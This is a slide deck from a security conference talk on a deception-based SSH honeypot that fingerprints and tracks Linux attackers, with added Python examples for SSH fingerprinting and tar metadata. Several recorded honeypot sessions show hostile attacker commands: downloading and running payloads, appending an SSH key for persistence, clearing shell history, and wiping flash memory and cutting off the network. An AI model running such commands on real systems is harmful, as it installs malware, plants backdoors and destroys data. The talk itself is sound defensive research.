
1

BlueHat v18 || The matrix has you - protecting linux using deception

3

Attacker spectrum (diagram on the slide, from most to least capable)
• APT / nation state: high impact, low frequency; countered by analysts and red teaming
• Organised groups: crime / hacktivism
• Automated bots / ‘script kiddy’: high frequency, arguably also high impact; generally easily rebuked via software updates, firewalls etc

4

Who is attacking? (chart on the slide)
• Botnet attacks: the biggest bots (MIRAI etc, Raspberry Pi) account for 1500 identical commands
• Real people: all the commands typed in fewer than 500 times

5

Anatomy of a Linux attack
1. Exploit and immediate action
2. Brute force and immediate action
3. Brute force creds…move to different infrastructure…and action
• Coin mining is extremely popular

7

What is deception?
• Emerging area of InfoSec
• Usually centred around the human behind the attack
• Has actually been around a long time

8

Honeypots
• Standard technique to study attackers for many years
• Low – dumb listener / just log network connections
• Medium – emulate key services
• High – actual OS

9

Honeypots are broken!
• Relatively easy to spot a honeypot
• Lots of ports, Shodan, odd routes to the Internet
• Honeypots tell you about an attack but not the attacker
• Do we care about the attack or the attacker?
• Deception is usually used for alerting, can we use it for tracking?

10

Honeypots & the fog of war
(Diagram: a honeypot where every command succeeds shows “only success”)

11

Enter the hybrid
(Diagram: a scale from “only success” to “only failure”; traditional honeypots sit at the extreme cases, the hybrid in between)

12

Hybrid
• Provide an environment that appears to be legitimate
• Take the best of low / medium interaction honeypots
• Add faults to cause an attacker to take alternative actions
• Faults are targeted to collect information we want
• New IPs, files, URLs etc
• Combine with traditional honeypots to see the outcome of an attack

18

These are your tools
• Lies
• Persuasion
• Mimicry
• Distraction
• Traps & Decoys
• Lures & Breadcrumbs
• Everything society told you not to do!

19

Threat model
• Not bots
  • Just need a good simulation
• Not state / APT
  • Simulation won’t be good enough
  • High end actors are targeted in their attacks, won’t find us etc
• Middle ground
  • Real people, script kiddies

20

(Diagram: attacker, honeypot and real systems)

22

How is it implemented?
• 100% C# SSH implementation with Bash/Linux simulator on top
• Can PuTTY, SFTP & SCP, Docker, MySQL (and more)
• Logs all TCP/SYN for trends
• 3 attempts to login, successful logins are cached
• Kernel & OS is randomised
• Results are canned or coded in C#
• 100% simulation, nothing is ever executed

23

Deployment → Processing → Results (diagram)
• Deployment: VMs on Azure and other providers, in Japan, UK & EU West, USA Central and USA West
• Processing and results: Log Analytics, VirusTotal, threat intel feeds, internal sources and tools, MSRC

24

• Format data as JSON
• Code on GitHub to upload
• Query in NRT (near real time)

25

Listening carefully
• SSH protocol is complex
• It’s remote access, it’s a proxy, it’s file transfer
• Bit like SSL/TLS, you start by negotiating crypto
• Client/server say what algorithms they support
• Messages are passed from client to server and responded to
• Lots of extensions (such as PuTTY ones)

26

What do we get by listening hard?
• The client sends machine specific data to the server
  • ciphers, agent strings, supported modes, terminal size
  • Environment variables (we really do see locales)
• The first packet comes from the attacker’s machine
  • This has some magic fields: TTL, window size, TCP timestamp

27

And the point of all this?
• Can use sources of entropy to build a fingerprint & track across infrastructure
• We can work out
  • Attacker’s real OS
  • How deep they are in a network
  • How long their machine has been up (highly unreliable)
• Can compare real OS to the SSH agent banner
• Maybe even look up identity!
  • https://github.com/FiloSottile/whosthere
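The client-side values the last three slides describe (identification banner, KEXINIT name-lists, TTL and window of the first SYN) folded into a tracking fingerprint, as an added Python example that is not the talk’s C# honeypot. The SSH message, TTL and window values are constructed, and the TTL-to-OS mapping assumes the usual initial TTLs of 64, 128 and 255.

```python
import hashlib
import struct

# Constructed sample observations for one client session (not real attacker data).
SAMPLE_ID_LINE = b"SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u3\r\n"   # identification string
SAMPLE_TTL = 51          # IP TTL seen on the first SYN
SAMPLE_WINDOW = 29200    # TCP window size on that SYN

def name_list(names):
    """Encode an SSH name-list: uint32 length + comma-separated names (RFC 4251)."""
    return struct.pack(">I", len(names)) + names

def build_kexinit(kex, host_key, ciphers, macs):
    """Construct a minimal SSH_MSG_KEXINIT payload (RFC 4253 section 7.1)."""
    body = b"\x14" + b"\x00" * 16                    # message id 20 + 16-byte cookie
    for nl in (kex, host_key, ciphers, ciphers, macs, macs, b"none", b"none", b"", b""):
        body += name_list(nl)                         # the ten name-lists, c2s then s2c
    return body + b"\x00" + b"\x00\x00\x00\x00"       # first_kex_packet_follows, reserved

def parse_kexinit(payload):
    """Return the ten name-lists of a KEXINIT payload as strings; these are client choices."""
    if payload[0] != 20:
        raise ValueError("not SSH_MSG_KEXINIT")
    off, lists = 17, []
    for _ in range(10):
        (n,) = struct.unpack_from(">I", payload, off)
        lists.append(payload[off + 4:off + 4 + n].decode("ascii"))
        off += 4 + n
    return lists

def guess_os_from_ttl(ttl):
    """Nearest common initial TTL (64 unix-like, 128 Windows, 255 other) and hop distance."""
    initial = min(t for t in (64, 128, 255) if t >= ttl)
    return {64: "linux/unix", 128: "windows", 255: "other"}[initial], initial - ttl

def fingerprint(id_line, kexinit, ttl, window):
    """Fold banner, algorithm preferences and TCP traits into a stable id for tracking."""
    banner = id_line.strip().decode("ascii")
    lists = parse_kexinit(kexinit)
    os_name, hops = guess_os_from_ttl(ttl)
    material = "|".join([banner, *lists[:6], os_name, str(window)])
    digest = hashlib.sha256(material.encode()).hexdigest()[:16]
    return {"banner": banner, "os": os_name, "hops": hops, "fingerprint": digest}

SAMPLE_KEXINIT = build_kexinit(
    b"curve25519-sha256,diffie-hellman-group14-sha1", b"ssh-ed25519,ssh-rsa",
    b"aes128-ctr,aes256-ctr", b"hmac-sha2-256,hmac-sha1")

if __name__ == "__main__":
    print(fingerprint(SAMPLE_ID_LINE, SAMPLE_KEXINIT, SAMPLE_TTL, SAMPLE_WINDOW))
```

The hop count and window are the parts that shift when the same client comes back through a proxy, which is what makes them useful for the “how deep in a network” question.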

29

Hybrid theory
• We want URLs
• Need to balance enumeration with attacker expectations
• Small wins & the rule of three
• Include reason why!
user@exploited:~$ wget 374.53.15.95/test.jpg -O a.out
Resolving baddomain.com (baddomain.com)... failed: Name or service not known.
user@exploited:~$ curl 374.53.15.95/test.jpg
curl: (22) The requested URL returned error: 403 Forbidden
user@exploited:~$ curl newdomain.com/test.jpg
user@exploited:~$ chmod +x a.out

30

Enrich existing data
• A lot of malware is uploaded in ZIP format
• ZIP spec doesn’t contain much machine specific metadata
• TAR does!
user@exploited:~$ unzip malware.zip
bash: unzip: command not found
user@exploited:~$ tar
tar: You must specify one of the `-Acdtrux' or `--test-label' options
Try `tar --help' or `tar --usage' for more information.
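Why the honeypot nudges an attacker from unzip to tar, as an added Python example that is not the talk’s code: it walks the raw USTAR headers of a constructed sample archive and pulls out the uid, gid, user/group names and mtime that the attacker’s own machine wrote into them, which ZIP headers do not carry in this form. The archive contents and owner values are constructed.

```python
import io
import tarfile

def _field(hdr, off, size):
    """NUL-terminated text field of a 512-byte tar header."""
    return hdr[off:off + size].split(b"\x00", 1)[0].decode("ascii", "replace")

def _octal(hdr, off, size):
    """Numeric tar fields are ASCII octal, possibly blank."""
    raw = _field(hdr, off, size).strip()
    return int(raw, 8) if raw else 0

def tar_header_metadata(data):
    """Walk a tar stream and return the machine-specific metadata in each USTAR header."""
    entries, off = [], 0
    while off + 512 <= len(data):
        hdr = data[off:off + 512]
        if hdr == b"\x00" * 512:                 # end-of-archive marker
            break
        size = _octal(hdr, 124, 12)
        entries.append({
            "name": _field(hdr, 0, 100),
            "mode": oct(_octal(hdr, 100, 8)),
            "uid": _octal(hdr, 108, 8),           # numeric owner on the packing host
            "gid": _octal(hdr, 116, 8),
            "mtime": _octal(hdr, 136, 12),        # when the file was last touched there
            "typeflag": chr(hdr[156]),
            "magic": _field(hdr, 257, 6),         # "ustar" marks a POSIX header
            "uname": _field(hdr, 265, 32),        # login name on the packing host
            "gname": _field(hdr, 297, 32),
        })
        off += 512 + ((size + 511) // 512) * 512  # skip header plus padded file data
    return entries

def build_sample_tar():
    """Constructed sample archive standing in for an attacker upload (not real malware)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tf:
        payload = b"#!/bin/sh\necho sample\n"
        ti = tarfile.TarInfo("source/main.sh")
        ti.size, ti.mode = len(payload), 0o755
        ti.uid, ti.gid = 1000, 1000
        ti.uname, ti.gname = "kali", "kali"
        ti.mtime = 1530000000
        tf.addfile(ti, io.BytesIO(payload))
    return buf.getvalue()

if __name__ == "__main__":
    for entry in tar_header_metadata(build_sample_tar()):
        print(entry)
```

Pax extended headers (typeflag “x”) show up as their own entries in this walk; when present, their key/value data overrides the fields above for the entry that follows.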

31

Tracking stolen data
• When attackers break in they nose around
• Might be looking for more creds
• Might be looking for data to steal
• Tokens used for years to signal when an attack has started
• https://canarytokens.org/generate
• We know we are under attack

32

How does it work?
• AWS credentials: using them triggers an email alert
• A URL: visiting it triggers an email alert
• Hosting real files on the honeypot

37

user@billingserver:~$ uname -a
Linux billingserver 4.15.0-1013
user@billingserver:~$ cat link.txt
This is the link to the temp mobile site, creds paydbadmin:!pP543fddgZ@
Was so long I had to shorten it! DO NOT SHARE AROUND!!!
https://bit.ly/2oWZ2aL
user@billingserver:~$ wget XXXXXXXX.altervista.org/scan.jpg -O a.out
Resolving altervista.org (altervista.org)... failed: Name or service not known.
user@billingserver:~$ wget http://111.222.333.444/scan.jpg
Resolving 111.222.333.444 (111.222.333.444)... failed: Name or service not known.
user@billingserver:~$ history -c
user@billingserver:~$ wget https://raw.githubusercontent.com/XXXX/XXX/master/source.zip
user@billingserver:~$ unzip source.zip
unzip: cannot find libzip1.so - found libgz.so libbz.so
user@billingserver:~$ wget https://raw.githubusercontent.com/XXXX/XXX/master/source.tgz
user@billingserver:~$ tar xvf && cd source
user@billingserver:~$ gcc main.c && ./a.out
Segmentation fault
user@billingserver:~$
Broadcast message from root@exploited
The system is shutting down in 1m due to UPS failure
user@billingserver:~$ echo 'ssh-rsa AAAAB3NzaC1yc2EAA==' >> ~/.ssh/authorized_keys
ALL USERS MUST AGREE TO THE TERMS & CONDITIONS
user@billingserver:~$ chmod +x a.out && .a.out

40

From DigitalOcean to Romania
A real attack mounted by a real person:
• Logs in from 198.199.70.152 & tries to install a coinminer, downloads ‘link.txt’
• Visits the link from 5.12.130.162 (IP is clean)
• I see an attacker visit the link from a Romanian IP
• I see info on an attack launched from a DigitalOcean IP & the Monero mining account

41

People making mistakes

44

Attackers proxying

45

A glitch in the matrix! Attacker of the month
(Racist profanity removed!)

46

A glitch in the matrix!
user@exploited:~$ lscpu
…
user@exploited:~$ nproc
8
user@exploited:~$ clear
user@exploited:~$ sudo su
root@:~$ cat /etc/*-release
cat: /etc/*-release: No such file or directory
user@exploited:~$ sudo su
root@:~$ cat /proc/mounts
root@:~$ cat /dev/urandom | mtd_write mtd0 - 0 32768
root@:~$ iproute del default
root@:~$ iptables -A INPUT -j DROP
root@:~$ reboot

47

‘White hat’ tries to fix my box
• Spare a thought for the attacker who ran ~60 commands and spent 10m trying to fix the honeypot’s DNS resolver!

48

Analysts develop new detections on this data

50

tl;dr
• We use deception technology to protect customers
• Understand the attacker as well as the attack
• Use Azure Security Centre to start benefiting
• Big data? Use Log Analytics and Kusto
• Ross.Bevington@Microsoft.com
